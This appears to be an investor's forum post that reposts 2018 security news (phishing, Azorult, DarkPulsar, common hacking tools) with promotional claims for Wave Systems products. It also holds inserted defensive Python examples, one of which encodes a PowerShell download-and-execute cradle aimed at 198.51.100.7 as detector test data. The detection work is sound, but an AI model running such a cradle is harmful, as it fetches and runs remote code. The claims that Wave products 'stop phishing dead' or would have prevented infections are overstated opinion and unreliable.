Wave may have been developing before the TPM 1.2 (open and programmable chip) with the Embassy Chip, but it still seems like Wave Software developed for the Trusted Client could be used for the TPM 1.2 and 2.0 since they are open and programmable. And with a Wave/Intertrust agreement it seems that Wave could have a big leg up on secure DRM that the market would want to use now (in light of my previous post).
It's Now Legal to Hack DRM to Repair Your Own Devices
https://gizmodo.com/its-now-legal-to-hack-drm-to-repair-your-own-devices-1830002757
In a blow to manufacturers that use digital rights management (DRM) protections to prevent consumers from tinkering with their own property, the Library of Congress has adopted new rules allowing anyone to hack the software of their devices for the purpose of performing repairs. The changes officially go into effect on October 28th.
Advocates in the “right to repair” movement have a lot of complaints about the various methods corporations use to control who repairs their products, box people into software updates, and force obsolescence. One of the complaints is that copyright law in the U.S. has made it illegal to break DRM that blocks a user's access to a device’s firmware. Motherboard first noticed that all changed today.
Every three years the U.S. Copyright Office reviews its own copyright rules and proposes various exemptions that have to be approved by the Librarian of Congress. On Thursday, the order was released adopting sweeping exemptions to DRM protections on devices like smartphones, tablets, smart TVs, cars, and smart home appliances. Previously, the Copyright Office only allowed consumers to hack the firmware of tractors when they wanted to do a repair. The new rules make it legal to break into practically any device that has been “lawfully acquired” as long as the intent is to diagnose, maintain or repair the device, “and is not accomplished for the purpose of gaining access to other copyrighted works.”
Practically speaking, the repercussions of this decision aren’t that big of a deal. Nathan Proctor leads consumer advocacy group US PIRG’s right to repair initiatives. He told Motherboard that his reading of the new rules essentially gives people the ability to restore their devices to the factory settings. Making modifications to the firmware is still prohibited and hackers are only allowed to break the DRM in order to bring the product back “to a state of working in accordance with its original specifications.”
It’s a small victory. And the wider effort to get right to repair laws for hardware on the books in multiple states continues.
=================================================================
If there was an online movie service called Wavexpress, DRM may require hardware (TPM) to harden and protect the service. Wave had an agreement many years ago with Intertrust to harden DRM with the TPM. This may help prevent the hacking of DRM for movies. Sony/Philips bought out Intertrust, but may want to exercise the Wave/Intertrust agreement. After seeing this article it seems that many service providers would want the protection of hardware (TPM) for their content.
Phishing Report Shows Microsoft, Paypal, & Netflix as Top Targets
https://www.bleepingcomputer.com/news/security/phishing-report-shows-microsoft-paypal-and-netflix-as-top-targets/
A new phishing report has been released that keeps track of the top 25 brands targeted by bad actors. Of these brands, Microsoft, Paypal, and Netflix are the top brands impersonated by phishing attacks.
Email security provider Vade Secure tracks the 25 most spoofed brands in North America that are impersonated in phishing attacks. In their Q3 2018 report, a total of 86 brands are tracked, which account for 95% of all attacks detected by the company.
Overall, Vade Secure has stated that phishing attacks increased by 20.4% in the 3rd quarter with the most targeted being Microsoft, followed by PayPal, Netflix, Bank of America, and Wells Fargo.
-see the link for the top 25
Cloud based services and financial companies remain the two most targeted industries with Microsoft being the top targeted brand as attackers try to gain access to Office 365, One Drive, and Azure credentials.
"The primary goal of Microsoft phishing attacks is to harvest Office 365 credentials," stated Vade Secure's report. "With a single set of credentials, hackers can gain access to a treasure trove of confidential files, data, and contacts stored in Office 365 apps, such as SharePoint, OneDrive, Skype, Excel, CRM, etc. Moreover, hackers can use these compromised Office 365 accounts to launch additional attacks, including spear phishing, malware, and, increasingly, insider attacks targeting other users within the same organization."
Office 365 phishing emails typically indicate that the recipient's account has been suspended or disabled and then prompt them to log in to resolve the issue. These phishing forms are almost identical to the legitimate Office 365 login form, and by creating a sense of urgency, the attackers hope the victims will be less vigilant as they enter their credentials.
Microsoft is followed by PayPal phishing schemes, where attackers try to gain access to the victim's money, and Netflix, which is used to steal credit card information.
Of particular interest is that attackers tend to follow a pattern as to what days they send the most volume of phishing emails. According to the report, most work-related attacks tend to occur during the week, with Tuesday and Thursday being the largest volume days. For Netflix, the most targeted day is Sunday, when people are taking a break to watch some TV.
Phishing attacks become more targeted
Vade Secure has also noticed that attackers are starting to decrease the amount of times a particular URL is used in a phishing campaign. Instead attackers are using unique URLs in each phishing email in order to bypass mail filters.
"What should be more concerning to security professionals is that phishing attacks are becoming more targeted," continued Vade Secure's report. "When we correlated the number of phishing URLs against the number of phishing emails blocked by our filter engine, we found that the number of emails sent per URL dropped more than 64% in Q3. This suggests that hackers are using each URL in fewer emails in order to avoid detection by reputation-based security defenses. In fact, we’ve seen sophisticated phishing attacks where each email contains a unique URL, essentially guaranteeing that they will bypass traditional email security tools."
Protecting yourself from phishing attacks
As phishing attacks become more sophisticated, they also become harder to detect. Using cloud services, attackers are now able to secure their phishing forms with SSL certificates from well known and trusted companies such as Microsoft and Cloudflare. This allows the forms to look authentic to victims.
As you can see from the phishing attack pictured in the article, the login form looks legitimate, the site is on a Microsoft-owned domain, and the page is secured. To many, this would appear to be a legitimate Microsoft form. In reality, the attacker is hosting their form on a Microsoft cloud service in order to create this sense of legitimacy.
Therefore, it is always important to scrutinize a site before entering any login credentials. If the URL looks strange, there is incorrect spelling, grammar is incorrect, or something does not feel right then you should not enter any account credentials. Instead contact your administrator or the company itself if you are concerned your account has problems.
==================================================================
Wave has an authentication product for each of the top three companies identified in the article that will stop phishing dead in its tracks. Microsoft cloud phishing could be stopped by Wave VSC 2.0, Paypal phishing could be stopped by Wave Knowd, and Netflix phishing could be stopped by Wavexpress. It's unbelievable that Wave would have three amazing authentication products to stop this problem and this problem still continues to this day!!! With these products the hacker or attacker has to have the target person's device (with TPM) in order to be able to log on to applications such as Microsoft cloud, Netflix and Paypal. A stolen credential by the hacker will do him/her no good. These three companies are an example, as the potential authentication (TPM) market is much larger.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
=================================================================
https://www.wavesys.com/buzz/pr/wave-knowd-introduces-new-model-internet-authentication-without-passwords
Wave Knowd Introduces New Model for Internet Authentication Without Passwords
Knowd ‘Trust Score’ Assures User Identity when Accessing Web Services
=================================================================
Wavexpress:
https://www.wavesys.com/buzz/pr/wave-q2-2008-revenues-rise-41-record-20-million-continued-growth-software-license-sales
** PR doesn't reveal the capability of Wavexpress with regard to authentication with the TPM. Wavexpress was shut down years ago, but their technology was awesome and it could have benefits today. imo. Unfortunately, the Spragues are with a different company and they know what Wavexpress's true capabilities are!
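The drop in emails per URL that the Vade Secure report above describes is easy to miss when a filter keys on exact URLs only. The following is an added example, not code from the post and not from Wave or Vade Secure; the blocked-mail records, hostnames and token format in it are constructed for the demo. It computes the raw emails-per-URL ratio, then collapses per-recipient tokens in the path so that structurally identical links cluster into one campaign, and flags clusters whose links are (almost) never reused, which is the per-mail unique URL pattern the report warns about.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample of (recipient, URL) pairs taken from blocked phishing mail; not real data.
# Every Office 365 lure carries a different link, so an exact-URL reputation list sees each once.
BLOCKED_MAILS = [
    ("alice@example.com", "https://login-verify.example.net/o365/a81f3c9e2d77/index.php"),
    ("bob@example.com",   "https://login-verify.example.net/o365/5be0c4d19a02/index.php"),
    ("carol@example.com", "https://login-verify.example.net/o365/e3d7a0f4c1b6/index.php"),
    ("dave@example.com",  "https://paypal-secure.example.org/u/7f2e9bc3a5d1"),
    ("erin@example.com",  "https://paypal-secure.example.org/u/0c4d8e1f6a2b"),
    ("frank@example.com", "https://paypal-secure.example.org/u/0c4d8e1f6a2b"),   # link reused once
]

# Path segments that look like opaque per-recipient tokens (hex of 8+ or base64url of 16+ chars).
TOKEN_RE = re.compile(r"^(?:[0-9a-f]{8,}|[A-Za-z0-9_-]{16,})$")


def normalize_url(url: str) -> str:
    """Replace token-like path segments with {tok} so one campaign maps to one pattern."""
    parts = urlsplit(url)
    segs = ["{tok}" if TOKEN_RE.fullmatch(s) else s for s in parts.path.split("/")]
    return f"{parts.scheme}://{parts.netloc.lower()}{'/'.join(segs)}"


def emails_per_url(mails) -> float:
    """The metric from the report: blocked mails divided by distinct URLs seen."""
    return len(mails) / len({url for _, url in mails})


def cluster_campaigns(mails) -> dict:
    """Group mails by normalized URL pattern; returns pattern -> [(recipient, url), ...]."""
    clusters = defaultdict(list)
    for rcpt, url in mails:
        clusters[normalize_url(url)].append((rcpt, url))
    return dict(clusters)


def per_recipient_url_campaigns(mails, max_reuse: float = 1.2) -> dict:
    """Clusters whose links are essentially never reused: pattern -> number of mails.

    A reuse ratio near 1.0 means every recipient got a unique link, so blocking
    by exact URL would have stopped none of the later mails."""
    flagged = {}
    for pattern, members in cluster_campaigns(mails).items():
        reuse = len(members) / len({url for _, url in members})
        if reuse <= max_reuse:
            flagged[pattern] = len(members)
    return flagged


if __name__ == "__main__":
    print("emails per URL:", emails_per_url(BLOCKED_MAILS))
    for pattern, members in cluster_campaigns(BLOCKED_MAILS).items():
        print(f"{len(members)} mails -> {pattern}")
    print("per-recipient link campaigns:", per_recipient_url_campaigns(BLOCKED_MAILS))
```

Clustering on the normalized pattern (host plus tokenless path) is what lets a filter block the campaign after the first sample even though no later mail repeats a URL; the hostnames and the token regex are assumptions you would tune to your own blocked-mail data.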
Zero-days, fileless attacks are now the most dangerous threats to the enterprise
https://www.zdnet.com/article/zero-days-fileless-attacks-are-now-the-most-dangerous-threats-to-the-enterprise/
These attacks cost the average organization millions and SMBs are the worst affected
Zero-day vulnerabilities and fileless attacks are now deemed the most dangerous threats to the enterprise.
According to a study conducted by the Ponemon Institute and sponsored by Barkly, called the "2018 State of Endpoint Security Risk report," nearly two-thirds of enterprise players have been compromised in the past 12 months by attacks which originated at endpoints, which the organization says is a 20 percent increase year-on-year.
Such attacks can prove costly, with the average company enduring a cost of $7.12 million, or $440 per endpoint.
Small to medium-sized businesses, which may not have the same cybersecurity solutions or teams in place due to investment limitations, suffer more -- with the cost per endpoint close to double, at $763.
In total, the average cost of a successful endpoint-based attack has increased by roughly 42 percent year-on-year.
According to the survey, which recorded the responses of 660 IT and cybersecurity professionals, zero-day vulnerabilities and fileless attacks are today's biggest threats to organizations.
Zero-day vulnerabilities are previously unknown bugs which are unpatched by vendors. These types of security flaws, depending on the severity and the affected software, can be used to conduct attacks including account hijacking, network compromise, and data theft.
Fileless attacks, however, leverage exploits or launch scripts from memory in order to circumvent detection by antivirus solutions.
"76 percent of successful attacks leveraged unknown and polymorphic malware or zero-day attacks, making them four times more likely to succeed in compromise compared to traditional attack techniques," Ponemon says.
In last year's survey, the organization estimated that 29 percent of attacks faced by the enterprise in 2017 were fileless and this was expected to rise to 35 percent this year.
Respondents of this year's survey estimated that 37 percent of attacks launched against their companies were zero-day attacks -- a 48 percent increase from 2017 -- whereas 35 percent utilized fileless techniques.
Resolving zero-day vulnerabilities requires the creation of patches, but implementing these fixes can often be delayed due to the need to triage threats.
Not all zero-days are created equal and they will not hold the same risk for every organization -- but it just takes one to be overlooked for a successful attack to take place.
The research estimates the average delay in applying a patch to a vulnerable endpoint is 102 days due to triage, testing, and implementation requirements.
Together with fileless attacks which can dance around traditional, signature-based security solutions, organizations are struggling to keep up with modern security issues -- and so 70 percent have already replaced or plan to replace antivirus solutions for more modern alternatives within the next 12 months.
High false positive rates, management complexity, and inadequate protection were cited as the top frustrations of IT professionals when it comes to standard antivirus solutions.
"This increase in successful attacks has exposed a gap in protection that existing solutions and processes are not addressing," said Larry Ponemon, Chairman and Founder of the Ponemon Institute. "Antivirus products missed more attacks than they stopped in 2018 and organizations believe their current antivirus is effective at blocking only 43 percent of attacks."
Cybersecurity is an ongoing problem for SMBs and enterprise players alike. Data breaches alone are becoming a daily occurrence, with British Airways, the US State Department, the Pentagon, and Facebook making up only a handful of recent victims.
=================================================================
https://www.wavesys.com/malware-protection
Excerpt:
Wave’s solution: start with the device
If antivirus software doesn’t work, what does? The Wave alternative relies not on superficial layers of software but on standards-based hardware: self-encrypting drives (SEDs) and Trusted Platform Modules (TPMs), or security chips, that are already embedded in many of your computers and mobile devices. This hardware provides you with secure storage. When you turn the SED and TPM on and manage them with Wave, you suddenly have a broad, deep view into your network. Among other things, you’ll know immediately whether any one of your devices—computers, laptops, tablets, smartphones—has been tampered with. But Wave is proactive too: you can block the kinds of behaviors that invite malware in. Wave's Endpoint Monitor provides early detection for these low-lying sneaky attacks.
==================================================================
https://www.wavesys.com/products/wave-endpoint-monitor
Excerpts:
Detect attacks before it’s too late
Malware can do its work for weeks or months before you ever know it’s there. But with Wave Endpoint Monitor, you can spot malware before it has a chance to cause damage.
Antivirus software can’t detect rootkits and other malware; it works at the level of the OS and isn’t very good at seeing deeper into the system. For example, it can’t tell whether the boot record is lying. The Wave alternative is to work with the Trusted Platform Modules (TPMs), or security chips, embedded in your devices. By using the TPM to attest to the security of the device each time that device boots, Wave looks below the operating system and can help detect threats lurking there. Every time a device boots up, Wave Endpoint Monitor makes a comparison against previous boot values, and if anything deviates from the norm, it alerts you immediately.
An open standard means Wave works with everything
Wave Endpoint Monitor works on your existing hardware, across platforms. That’s because our solutions are based on an open standard that’s already been implemented on many laptops and is now working its way onto mobile devices. We’re talking about those TPMs. We just don’t think that expensive new equipment and vendor lock-in are great selling points.
Key Features:
Easy security compliance
• Comports with NIST guidelines for BIOS integrity
Data protection
• Ensures that you can trust the integrity of your measurements for central analysis
• Real-time alerts for zero-day detection of APTs
• Get Windows 8 Malware protection now—WEM covers previous versions of Windows
Simplicity
• Uses standards-based security that’s in every PC you own
• Measurement notifications and reports can be customized for your processes and work flows
• Centralized, remote activation and management of your TPMs
• E-discover which PCs in your organization are enabled for endpoint monitoring
No compromises
• Ensure host integrity—without expensive hardware or excessive administrative overhead
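The Wave Endpoint Monitor excerpt above says it compares each boot against previous boot values. Those values are the TPM's platform configuration registers (PCRs), which software cannot write, only extend: each measured component's hash is folded into the register as PCR = H(PCR || hash), so the final value depends on every component and on the order they ran. The following is an added example, not Wave's code and not from the post, that replays a constructed boot event log to show how a register is built up and why a swapped boot manager surfaces as drift in exactly one PCR. The PCR numbering (0 firmware, 4 boot manager, 7 Secure Boot policy) follows the TCG PC Client convention, and the measured strings are made up for the demo.

```python
import hashlib

PCR_LEN = 32                      # SHA-256 bank
ZERO_PCR = b"\x00" * PCR_LEN      # reset value of a resettable-at-power-on PCR


def extend(pcr: bytes, digest: bytes) -> bytes:
    """TPM PCR extend: new = SHA-256(old || digest). One-way and order-dependent."""
    return hashlib.sha256(pcr + digest).digest()


def replay_event_log(events) -> dict:
    """Recompute PCR values from an ordered (pcr_index, measured_bytes) event log.

    Firmware hashes each component and extends the hash into its PCR before
    handing control to it, so a modified component changes the register even
    if it later lies about itself."""
    pcrs = {}
    for idx, data in events:
        pcrs[idx] = extend(pcrs.get(idx, ZERO_PCR), hashlib.sha256(data).digest())
    return pcrs


def diverged_pcrs(baseline: dict, current: dict) -> list:
    """Indices whose current value differs from the recorded baseline (or are missing)."""
    return sorted(i for i in baseline if baseline[i] != current.get(i))


# Constructed event logs (assumed PCR usage: 0 firmware, 4 boot manager, 7 Secure Boot state).
GOLDEN_BOOT = [
    (0, b"UEFI firmware 1.2"),
    (4, b"\\EFI\\Microsoft\\Boot\\bootmgfw.efi build 10.0.17763"),
    (7, b"SecureBoot=1 PK=OEM db=Microsoft"),
]
# Same machine, but the boot manager on disk has been replaced by a bootkit-laden copy.
TAMPERED_BOOT = [
    (0, b"UEFI firmware 1.2"),
    (4, b"\\EFI\\Microsoft\\Boot\\bootmgfw.efi build 10.0.17763 + bootkit"),
    (7, b"SecureBoot=1 PK=OEM db=Microsoft"),
]


def check_boot(baseline_events, current_events) -> list:
    """Compare a boot against the stored baseline; returns the PCRs that drifted."""
    return diverged_pcrs(replay_event_log(baseline_events), replay_event_log(current_events))


if __name__ == "__main__":
    for idx, value in replay_event_log(GOLDEN_BOOT).items():
        print(f"PCR{idx}: {value.hex()}")
    print("drifted PCRs:", check_boot(GOLDEN_BOOT, TAMPERED_BOOT))   # [4]
```

The comparison step is the easy part. What makes it worth anything is where the current values come from: a monitor must obtain them as a TPM quote signed by an attestation key that lives in that chip, not as numbers reported by the operating system, because an OS that is already infected can simply echo the baseline. The replay above only shows how the values are derived and why a single changed component is visible.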
Password and credit card-stealing Azorult malware adds new tricks
https://www.zdnet.com/article/password-and-credit-card-stealing-azorult-malware-adds-new-tricks/
Malware can now steal more types of cryptocurrency and comes with other updates, likely in response to a free version being leaked online
A form of password, credit card details and cryptocurrency-stealing malware has been updated, making it even more potent for cyber criminals.
The Azorult malware has been operating since 2016 and enables crooks to steal credentials including passwords, credit card details, browser histories and contents of cryptocurrency wallets from victims.
Now a new version of it is being advertised in an underground forum, as uncovered by researchers at tech security company Check Point, who describe it as "substantially updated".
New features include the ability to steal additional forms of cryptocurrency from the wallets of victims - BitcoinGold, electrumG, btcprivate (electrum-btcp), bitcore and Exodus Eden.
Reflecting the fast pace of malware development, the developer of Azorult also boasts improvements to the cryptocurrency wallet stealer components and improvements to the loader.
Researchers also note some behind-the-scenes changes compared to previous versions of the malware, including a new encryption method to obfuscate the domain name, as well as a new key for connecting to the command and control server.
This new version of the malware first appeared for sale on October 4 - shortly after source code for Azorult versions 3.1 and 3.2 were leaked online. Check Point has already seen the free tools being used to power Gazorp, a malware builder which allows users to essentially generate an earlier version of Azorult at no cost.
It's likely this which has spurred the author of Azorult into releasing a new and improved version of the malware for sale.
"It is plausible that the Azorult's author would like to introduce new features to the malware and make it worthy as a product in the underground market," said Israel Gubi, malware researcher at Check Point.
The latest version of Azorult is delivered through the RIG exploit kit, using vulnerabilities in Internet Explorer and Flash Player to launch JavaScript, Flash, and VBScript-based attacks to distribute malware to users.
Previous versions of Azorult have also been known to be distributed via phishing emails which encourage potential victims to download a malicious Microsoft Word attachment, which when run, takes advantage of exploits in order to download and install the malware.
With Azorult seemingly reliant on known vulnerabilities to spread, users can go a long way to protect themselves from falling victim to it by ensuring they've installed the relevant software updates and patches.
=================================================================
Kaspersky says it detected infections with DarkPulsar, alleged NSA malware
https://www.zdnet.com/article/kaspersky-says-it-detected-infections-with-darkpulsar-alleged-nsa-malware/
Victims located in Russia, Iran, and Egypt; related to nuclear energy, telecommunications, IT, aerospace, and R&D.
Kaspersky Lab said today that it detected computers infected with DarkPulsar, a malware implant that has been allegedly developed by the US National Security Agency (NSA).
"We found around 50 victims, but believe that the figure was much higher," Kaspersky Lab researchers said today.
"All victims were located in Russia, Iran, and Egypt, and typically Windows 2003/2008 Server was infected," the company said. "Targets were related to nuclear energy, telecommunications, IT, aerospace, and R&D."
Kaspersky researchers were able to analyze DarkPulsar because it was one of the many hacking tools that were dumped online in the spring of 2017.
The hacking tools were leaked by a group of hackers known as the Shadow Brokers, who claimed they stole them from the Equation Group, a codename given by the cyber-security industry to a group that's universally believed to be the NSA.
DarkPulsar went mostly unnoticed for more than 18 months as the 2017 dump also included EternalBlue, the exploit that powered last year's three ransomware outbreaks --WannaCry, NotPetya, and Bad Rabbit.
Almost all the infosec community's eyes have been focused on EternalBlue for the past year, and for a good reason, as the exploit has now become commodity malware.
But in recent months, Kaspersky researchers have also started to dig deeper into the other hacking tools leaked by the Shadow Brokers last year.
They looked at FuzzBunch, which is an exploit framework that the Equation Group has been using to deploy exploits and malware on victims' systems using a command-line interface similar to the Metasploit pen-testing framework.
They also looked at DanderSpritz, a FuzzBunch plugin that works as a GUI application for controlling infected victims.
DarkPulsar is a FuzzBunch "implant," a technical term that means "malware," that's often used together with DanderSpritz.
But in a report released today, Kaspersky researchers said the DarkPulsar code included in the Shadow Brokers leak isn't the entirety of DarkPulsar.
"We analyzed this tool and understood that it is not a backdoor itself, but the administrative part only," Kaspersky said.
A major breakthrough came when they realized that some constants from the DarkPulsar administrative interface code were also most likely used by the actual malware.
Researchers created special rules to detect these constants in files scanned by the Kaspersky antivirus. This is how they detected the roughly 50 computers that were still infected with the actual DarkPulsar malware.
Based on the functions they found in the DarkPulsar admin interface, researchers say the malware is primarily used as a backdoor to infected computers.
The malware's main features are its ability to run arbitrary code via a function named "RawShellcode" and the ability to upload other DanderSpritz payloads (malware) via the "EDFStageUpload" function, greatly expanding the operator's hold and capabilities on an infected system.
Kaspersky researchers also believe that the number of computers that have been infected with DarkPulsar is most likely larger than the 50 detections they found.
The malware also included a self-delete function, which Equation Group operators likely used to cover their tracks after the Shadow Brokers dumped their tools online.
"So the 50 victims are very probably just ones that the attackers have simply forgotten," researchers said.
As for who is behind these hacks, Kaspersky didn't say. It is unclear if the Shadow Brokers managed to get their hands on the full DarkPulsar malware but then opted not to include the actual backdoor in the package of leaked tools.
These 50 infections could very easily be the work of Equation Group cyber-espionage operations or the work of the Shadow Brokers themselves.
==================================================================
These two articles discuss malware and Wave has Wave Endpoint Monitor which doesn't have to be modified to detect complicated strains of malware, it's ready to detect malware out of the box. If the computers in article 2 were using Wave Endpoint Monitor in the first place, Kaspersky wouldn't have had the malware to detect! imo.
Besides using WEM in article one to detect the malware, Wave VSC 2.0 would have rendered the password stealing moot due to a PIN and the TPM protecting the computer.
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/malware-protection
https://www.wavesys.com/products/wave-endpoint-monitor
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
https://www.wavesys.com/
Security warning: Attackers are using these five hacking tools to target you
https://www.zdnet.com/article/security-warning-attackers-are-using-these-five-hacking-tools-to-target-you/
Free - but powerful - tools are being used by everyone ranging from cyber criminals to nation-state operators, says a report by five government security agencies
Attackers ranging from nation-state backed espionage groups to cyber criminal operations are increasingly turning to openly available hacking tools to help conduct campaigns, the cyber security authorities of Australia, Canada, New Zealand, the UK and US have warned.
The research by the nations involved in the 'Five Eyes' intelligence sharing arrangement provides a snapshot of some of threats posed by cyber actors worldwide by detailing some of the commonly available tools used in attacks.
They are all freely available -- often on the open web -- and include remote access trojans, web shells and obfuscation tools. Combinations of some or all of these have been used in attack campaigns by some of the most prolific attackers around.
"Tools and techniques for exploiting networks and the data they hold are by no means the preserve of nation states, or criminals on the Dark Web," said the report.
"Experience from all our countries makes it clear that, while cyber actors continue to develop their capabilities, they still make use of established tools and techniques. Even the most sophisticated groups use common, publicly-available tools to achieve their objectives," the report adds.
The UK's National Cyber Security Agency notes that the list of tools is far from exhaustive, but it's designed to help network defenders protect against some of the most commonly used free hacking tools.
Remote Access Trojans
Perhaps the most potentially damaging of the dangers detailed in the report are remote access trojans -- malware which is secretly installed onto an infected system providing a backdoor to observe all activity and enabling the attacker to carry out commands that lead to data being stolen.
The particular example given in the report is JBiFrost, a trojan typically employed by low-skilled cyber criminals but with the capability to be exploited by state actors. What makes JBiFrost so potent is that it is cross-platform, with the ability to operate on Windows, Linux, Mac OS X, and Android.
Often delivered via a phishing email, it allows attackers to move across networks and install additional software. This particular RAT is publicly available and the cyber security agencies said they have observed it being used in targeted attacks against critical national infrastructure owners and their supply-chain operators.
Web Shells
Web shells are malicious scripts that attackers upload to targets after an initial compromise in order to gain remote administrative capabilities, providing those behind the attack with the potential to really get their hooks into the target system -- as well as being used to pivot to other areas of the network.
One example of freely available Web Shells is China Chopper, which has been used widely by attackers to remotely access compromised web servers. Once installed on a system, the China Chopper web shell server can be accessed by the attacker at any time -- among other things it can copy, rename, delete, and even change the time-stamp of files.
Mimikatz
Mimikatz is an open-source utility used to retrieve clear text credentials and hashes from memory and has been available since 2007. While it wasn't designed as a hacking tool and has legitimate use-cases, it is also used as a means of gaining access to credentials and admin privileges.
It's been used in a wide variety of campaigns by various groups -- this includes the NotPetya and BadRabbit ransomware attacks, where it was employed to extract administrator credentials from Windows machines in order to help facilitate the spread of the attack.
PowerShell Empire
Designed as a legitimate penetration testing tool in 2015, it didn't take attackers long to realise they could use PowerShell Empire to help conduct malicious activity. The tool allows attackers to escalate privileges, harvest credentials, exfiltrate information, and move laterally across a network.
It also comes with the added bonus of operating almost entirely in the memory -- making it difficult to trace -- and the fact that because PowerShell is a legitimate operation, malicious activity often goes unnoticed by security software.
Such is the potency of PowerShell Empire, it's become commonly used by both nation states and cyber criminals to stealthily conduct campaigns.
C2 obfuscation tools
Unless they don't care about being discovered, attackers will often look to hide their tracks when compromising a target, using specific tools in order to obfuscate their location and activity.
One which is used in many attacks is Htran, an obfuscation tool which has been freely available on the internet since 2009 and is often re-uploaded to places like GitHub. By using this tool, attackers can evade intrusion detection systems and hide communications with their command and control infrastructure.
The report says a broad range of cyber actors have been observed using Htran in attacks against both government and industry targets.
The cyber security agencies warn that these are far from the only hacking tools freely available to attackers. However, there are a number of steps that organisations can take to improve their chances of not falling victim to campaigns using these or similar tools.
Recommendations by the NCSC include using multi-factor authentication, segregating networks, setting up a security monitoring capability and keeping systems and software up to date.
=================================================================
Recommendations should say: consider using better multi-factor authentication (security) like Wave VSC 2.0!!!
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
White paper (great read):
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
I included Wave Endpoint Monitor link because RATs were discussed in the article above and WEM successfully deals with them and many other extremely difficult to spot malware.
https://www.wavesys.com/products/wave-endpoint-monitor
https://www.wavesys.com/ - For excellent cybersecurity products that for the moment appear to be undiscovered. Better security at less than half the cost!!
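The PowerShell Empire passage in the article above notes that the agent runs almost entirely in memory and that PowerShell itself is legitimate, so the process launch is often the only thing left to look at: a one-liner handed to powershell.exe with -EncodedCommand, which stages everything else from memory. The following is an added example, not from the post and not from the Five Eyes report or any vendor; it scans constructed process-creation command lines (the kind Windows event 4688 or Sysmon event 1 carries) for an encoded payload, decodes it the way PowerShell does (base64 of UTF-16LE) and scores the command line plus decoded text against a small indicator list. The indicator regexes, the sample lines and the staging URL are assumptions for the demo.

```python
import base64
import binascii
import re

# Constructed process-creation command lines; not real telemetry. The download-cradle
# script and the benign script are encoded below exactly as an operator would encode them.
CRADLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/launcher.ps1')"
BENIGN_SCRIPT = "Get-Date"


def ps_encode(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_LOG = [
    "powershell.exe -NoP -W Hidden -Enc " + ps_encode(CRADLE_SCRIPT),
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    "powershell.exe -ec " + ps_encode(BENIGN_SCRIPT),
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand plus the documented -e / -ec.
ENC_FLAG_RE = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)")

# Behavioural indicators (assumed list for the demo), matched against the raw
# command line and the decoded payload together.
INDICATORS = {
    "invoke_expression": re.compile(r"(?i)\bIEX\b|Invoke-Expression"),
    "download_cradle": re.compile(r"(?i)DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest"),
    "hidden_window": re.compile(r"(?i)-W(?:indowStyle)?\s+Hidden"),
    "no_profile": re.compile(r"(?i)(?:^|\s)-NoP(?:rofile)?\b"),
    "reflective_load": re.compile(r"(?i)FromBase64String|Reflection\.Assembly"),
}


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    for m in ENC_FLAG_RE.finditer(cmdline):
        flag, blob = m.group(1).lower(), m.group(2)
        if flag not in ("e", "ec") and not "encodedcommand".startswith(flag):
            continue  # e.g. -ExecutionPolicy also starts with -e
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            return None
    return None


def analyze(cmdline: str) -> dict:
    """Decode any encoded payload and score the launch; returns a dict for the SIEM/SOAR step."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline + "\n" + (decoded or "")
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    return {
        "cmdline": cmdline,
        "decoded": decoded,
        "indicators": hits,
        # An encoded launch with any indicator, or several indicators even without encoding.
        "suspicious": (decoded is not None and bool(hits)) or len(hits) >= 2,
    }


def triage(lines) -> list:
    return [analyze(line) for line in lines]


if __name__ == "__main__":
    for r in triage(SAMPLE_LOG):
        print("SUSPICIOUS" if r["suspicious"] else "ok        ", r["indicators"], repr(r["decoded"]))
```

An encoded command is not malicious by itself (the third sample decodes to a harmless Get-Date), which is why the score combines the encoding with what the decoded text does. Where PowerShell 5 Script Block Logging (event 4104) is enabled, the decoded script is logged at execution time anyway and can be fed through the same indicator list.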
Don’t Let Spoofing Fool You – SEC Says Internal Accounting Controls Should Address Cyber Threats
https://www.jdsupra.com/legalnews/don-t-let-spoofing-fool-you-sec-says-72692/
On October 16, 2018, the SEC released an Investigative Report detailing recent email spoofing schemes that caused nine public companies to lose a total of nearly $100 million. Building on its February 2018 guidance about the need for cybersecurity controls, the SEC wrote that the success of these cyber attacks underscores the need for issuers to “consider cyber-related threats when devising and maintaining their internal accounting control systems.” While the SEC chose not to bring enforcement actions in connection with these incidents, the Investigative Report further underscores the SEC’s focus on cybersecurity and is a strong reminder that the SEC will examine public companies’ controls, including disclosure controls, in the wake of a cyberincident to determine if the securities laws were violated.
February 2018 SEC Guidance on Cybersecurity
In February 2018, the SEC issued guidance about Public Company Cybersecurity Disclosures to assist public companies in preparing disclosures about cybersecurity risks and incidents. “Given the frequency, magnitude and cost of cybersecurity incidents,” the SEC stated “it is critical that public companies take all required actions to inform investors about material cybersecurity risks and incidents in a timely fashion.” The guidance described the importance of implementing comprehensive policies and procedures related to cybersecurity controls, including disclosure controls, and stressed the need to have in place policies to guard against insiders trading on material nonpublic information about cybersecurity risks and incidents.
Since issuing its February guidance, the SEC has brought enforcement actions against companies related to cyberincidents. In April 2018, the SEC announced a $35 million settlement with Yahoo!, the first settlement with a public company related to misleading investors by failing to disclose a data breach. And, in September 2018, the SEC brought its first-ever charges relating to a violation of the Identity Theft Red Flags Rule, fining Voya Financial Advisors Inc. $1 million stemming from a cyber attack that compromised personal information of over 5,000 customers. See our previous discussion of the Voya action for more information.
Details of SEC Investigative Report on Email Spoofing
